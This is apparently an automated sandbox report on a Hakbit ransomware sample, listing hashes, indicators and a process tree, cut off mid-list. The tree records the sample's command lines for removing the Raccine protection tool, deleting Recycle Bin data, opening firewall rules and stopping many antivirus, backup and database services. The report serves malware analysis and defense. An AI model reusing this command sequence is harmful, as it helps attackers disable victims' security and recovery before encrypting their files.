Analysis
-
max time kernel
150s -
max time network
86s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
19-04-2021 17:52
Static task
static1
Behavioral task
behavioral1
Sample
SyncApteka.bin.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
SyncApteka.bin.exe
Resource
win10v20210410
General
-
Target
SyncApteka.bin.exe
-
Size
128KB
-
MD5
9606a0bdc7a04dcf4d8625345c2875cd
-
SHA1
34c37511ef2105aedf55eda054e89210757f51ec
-
SHA256
aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7
-
SHA512
64796dde9fe7791e166cecb622d7713ef3a6947e404919eaba27c532fdf3be799f8ead904402a5b9dfff27977813c77e1c86954801c7bc4a867265d6aa36a595
Malware Config
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
hakbit
Signatures
-
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
SyncApteka.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\InitializeExport.raw => C:\Users\Admin\Pictures\InitializeExport.raw.ejqvfp SyncApteka.bin.exe File opened for modification C:\Users\Admin\Pictures\InitializeExport.raw.ejqvfp SyncApteka.bin.exe File renamed C:\Users\Admin\Pictures\StepCompare.png => C:\Users\Admin\Pictures\StepCompare.png.ejqvfp SyncApteka.bin.exe File opened for modification C:\Users\Admin\Pictures\StepCompare.png.ejqvfp SyncApteka.bin.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 3344 cmd.exe -
Drops startup file 1 IoCs
Processes:
SyncApteka.bin.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk SyncApteka.bin.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 2284 icacls.exe 524 icacls.exe 928 icacls.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2504 taskkill.exe 2480 taskkill.exe 2316 taskkill.exe 3780 taskkill.exe 3388 taskkill.exe 3848 taskkill.exe 412 taskkill.exe 2396 taskkill.exe 940 taskkill.exe 3508 taskkill.exe 2088 taskkill.exe 3188 taskkill.exe 3828 taskkill.exe 2592 taskkill.exe 2108 taskkill.exe 2808 taskkill.exe 3920 taskkill.exe 2252 taskkill.exe 3068 taskkill.exe 3124 taskkill.exe 3128 taskkill.exe 3020 taskkill.exe 3272 taskkill.exe 2392 taskkill.exe 3100 taskkill.exe 2572 taskkill.exe 4052 taskkill.exe 3056 taskkill.exe 1356 taskkill.exe 3268 taskkill.exe 2656 taskkill.exe 2516 taskkill.exe 952 taskkill.exe 3928 taskkill.exe 2272 taskkill.exe 2492 taskkill.exe 3540 taskkill.exe 3940 taskkill.exe 4020 taskkill.exe 3680 taskkill.exe 3484 taskkill.exe 3888 taskkill.exe 2796 taskkill.exe 2816 taskkill.exe 936 taskkill.exe 3196 taskkill.exe 2084 taskkill.exe 3976 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache rundll32.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 4592 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SyncApteka.bin.exepid process 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe 1756 SyncApteka.bin.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
SyncApteka.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1756 SyncApteka.bin.exe Token: SeDebugPrivilege 412 taskkill.exe Token: SeDebugPrivilege 3680 taskkill.exe Token: SeDebugPrivilege 3828 taskkill.exe Token: SeDebugPrivilege 940 taskkill.exe Token: SeDebugPrivilege 2796 taskkill.exe Token: SeDebugPrivilege 3128 taskkill.exe Token: SeDebugPrivilege 2272 taskkill.exe Token: SeDebugPrivilege 3388 taskkill.exe Token: SeDebugPrivilege 2480 taskkill.exe Token: SeDebugPrivilege 2816 taskkill.exe Token: SeDebugPrivilege 2316 taskkill.exe Token: SeDebugPrivilege 2252 taskkill.exe Token: SeDebugPrivilege 3196 taskkill.exe Token: SeDebugPrivilege 4020 taskkill.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 3068 taskkill.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 2592 taskkill.exe Token: SeDebugPrivilege 2656 taskkill.exe Token: SeDebugPrivilege 3100 taskkill.exe Token: SeDebugPrivilege 3268 taskkill.exe Token: SeDebugPrivilege 2492 taskkill.exe Token: SeDebugPrivilege 3124 taskkill.exe Token: SeDebugPrivilege 1356 taskkill.exe Token: SeDebugPrivilege 2088 taskkill.exe Token: SeDebugPrivilege 3020 taskkill.exe Token: SeDebugPrivilege 2084 taskkill.exe Token: SeDebugPrivilege 2108 taskkill.exe Token: SeDebugPrivilege 3188 taskkill.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 3272 taskkill.exe Token: SeDebugPrivilege 952 taskkill.exe Token: SeDebugPrivilege 3484 taskkill.exe Token: SeDebugPrivilege 3928 taskkill.exe Token: SeDebugPrivilege 3940 taskkill.exe Token: SeDebugPrivilege 3508 taskkill.exe Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 3780 taskkill.exe Token: SeDebugPrivilege 2516 taskkill.exe Token: SeDebugPrivilege 3888 taskkill.exe Token: SeDebugPrivilege 936 taskkill.exe Token: SeDebugPrivilege 2396 taskkill.exe Token: SeDebugPrivilege 2504 taskkill.exe Token: SeDebugPrivilege 4052 taskkill.exe Token: SeDebugPrivilege 3848 taskkill.exe Token: SeDebugPrivilege 3540 taskkill.exe Token: SeDebugPrivilege 3976 taskkill.exe Token: SeDebugPrivilege 2572 taskkill.exe Token: SeDebugPrivilege 3920 taskkill.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
SyncApteka.bin.exenotepad.exepid process 1756 SyncApteka.bin.exe 4592 notepad.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
SyncApteka.bin.exepid process 1756 SyncApteka.bin.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SyncApteka.bin.exenet1.exedescription pid process target process PID 1756 wrote to memory of 412 1756 SyncApteka.bin.exe taskkill.exe PID 1756 wrote to memory of 412 1756 SyncApteka.bin.exe taskkill.exe PID 1756 wrote to memory of 412 1756 SyncApteka.bin.exe taskkill.exe PID 1756 wrote to memory of 1112 1756 SyncApteka.bin.exe reg.exe PID 1756 wrote to memory of 1112 1756 SyncApteka.bin.exe reg.exe PID 1756 wrote to memory of 1112 1756 SyncApteka.bin.exe reg.exe PID 1756 wrote to memory of 528 1756 SyncApteka.bin.exe reg.exe PID 1756 wrote to memory of 528 1756 SyncApteka.bin.exe reg.exe PID 1756 wrote to memory of 528 1756 SyncApteka.bin.exe reg.exe PID 1756 wrote to memory of 1048 1756 SyncApteka.bin.exe schtasks.exe PID 1756 wrote to memory of 1048 1756 SyncApteka.bin.exe schtasks.exe PID 1756 wrote to memory of 1048 1756 SyncApteka.bin.exe schtasks.exe PID 1756 wrote to memory of 1196 1756 SyncApteka.bin.exe cmd.exe PID 1756 wrote to memory of 1196 1756 SyncApteka.bin.exe cmd.exe PID 1756 wrote to memory of 1196 1756 SyncApteka.bin.exe cmd.exe PID 1756 wrote to memory of 684 1756 SyncApteka.bin.exe cmd.exe PID 1756 wrote to memory of 684 1756 SyncApteka.bin.exe cmd.exe PID 1756 wrote to memory of 684 1756 SyncApteka.bin.exe cmd.exe PID 1756 wrote to memory of 664 1756 SyncApteka.bin.exe netsh.exe PID 1756 wrote to memory of 664 1756 SyncApteka.bin.exe netsh.exe PID 1756 wrote to memory of 664 1756 SyncApteka.bin.exe netsh.exe PID 1756 wrote to memory of 1808 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1808 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1808 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1320 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1320 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1320 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1456 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1456 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1456 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1844 1756 SyncApteka.bin.exe netsh.exe PID 1756 wrote to memory of 1844 1756 SyncApteka.bin.exe netsh.exe PID 1756 wrote to memory of 1844 1756 SyncApteka.bin.exe netsh.exe PID 1756 wrote to memory of 1604 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1604 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1604 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 948 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 948 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 948 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1636 1756 SyncApteka.bin.exe conhost.exe PID 1756 wrote to memory of 1636 1756 SyncApteka.bin.exe conhost.exe PID 1756 wrote to memory of 1636 1756 SyncApteka.bin.exe conhost.exe PID 1756 wrote to memory of 1336 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1336 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 1336 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 652 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 652 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 652 1756 SyncApteka.bin.exe sc.exe PID 1756 wrote to memory of 108 1756 SyncApteka.bin.exe net.exe PID 1756 wrote to memory of 108 1756 SyncApteka.bin.exe net.exe PID 1756 wrote to memory of 108 1756 SyncApteka.bin.exe net.exe PID 1756 wrote to memory of 1696 1756 SyncApteka.bin.exe net.exe PID 1756 wrote to memory of 1696 1756 SyncApteka.bin.exe net.exe PID 1756 wrote to memory of 1696 1756 SyncApteka.bin.exe net.exe PID 1756 wrote to memory of 888 1756 SyncApteka.bin.exe powershell.exe PID 1756 wrote to memory of 888 1756 SyncApteka.bin.exe powershell.exe PID 1756 wrote to memory of 888 1756 SyncApteka.bin.exe powershell.exe PID 1756 wrote to memory of 792 1756 SyncApteka.bin.exe net1.exe PID 1756 wrote to memory of 792 1756 SyncApteka.bin.exe net1.exe PID 1756 wrote to memory of 792 1756 SyncApteka.bin.exe net1.exe PID 1756 wrote to memory of 1852 1756 SyncApteka.bin.exe conhost.exe PID 1756 wrote to memory of 1852 1756 SyncApteka.bin.exe conhost.exe PID 1756 wrote to memory of 1852 1756 SyncApteka.bin.exe conhost.exe PID 108 wrote to memory of 1768 108 net1.exe net1.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
SyncApteka.bin.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" SyncApteka.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" SyncApteka.bin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe"C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1756 -
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:412 -
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:1112
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:528 -
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1048
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1196
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:684
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:664
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:1808
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1320
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1456
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:1844
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:948
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1604
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:1636
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1336
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:652
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y2⤵PID:108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵PID:1768
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y2⤵PID:1696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:1216
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y2⤵PID:888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵PID:964
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y2⤵PID:1952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵PID:2088
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:2072
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y2⤵PID:308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:2096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y4⤵PID:4064
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:1852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:2064
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y2⤵PID:792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵PID:1588
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y2⤵PID:860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵PID:2284
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y2⤵PID:560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:2452
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵PID:1140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:2396
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:2516
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:2332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:2552
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y2⤵PID:2344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:2712
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y2⤵PID:2260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:2704
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y2⤵PID:2240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:2524
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:2200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:2500
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y2⤵PID:2180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:2508
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:2160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:2420
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y2⤵PID:2384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:2668
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:2140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:2468
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:2440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:1708
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:2576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵PID:2688
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y2⤵PID:2588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:2272
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:2920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:2596
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:3132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵PID:2584
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:3116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:2728
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:3100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵PID:3088
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:3092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵PID:2724
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:3076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:2352
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:2624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵PID:2572
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:2692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵PID:1216
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:2716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵PID:2772
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:2712
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:2212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵PID:3172
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:2152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵PID:1768
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:2460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵PID:1520
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y2⤵PID:2112
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:2336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵PID:2556
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:2516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵PID:2280
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:2232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵PID:2852
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:2512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵PID:2764
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:2688
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:2504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵PID:2696
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵PID:3532
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:2164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵PID:3832
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:2420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵PID:3752
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:2568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵PID:3628
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:2540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵PID:3808
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:2536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵PID:436
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:2428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵PID:3800
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y2⤵PID:2600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵PID:4000
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:2132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵PID:4032
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:1624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵PID:3784
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:2436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵PID:3724
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:1640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵PID:3676
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:2292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:3664
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y2⤵PID:1644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:3868
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵PID:2548
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:2092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵PID:2264
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵PID:3704
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:1512
-
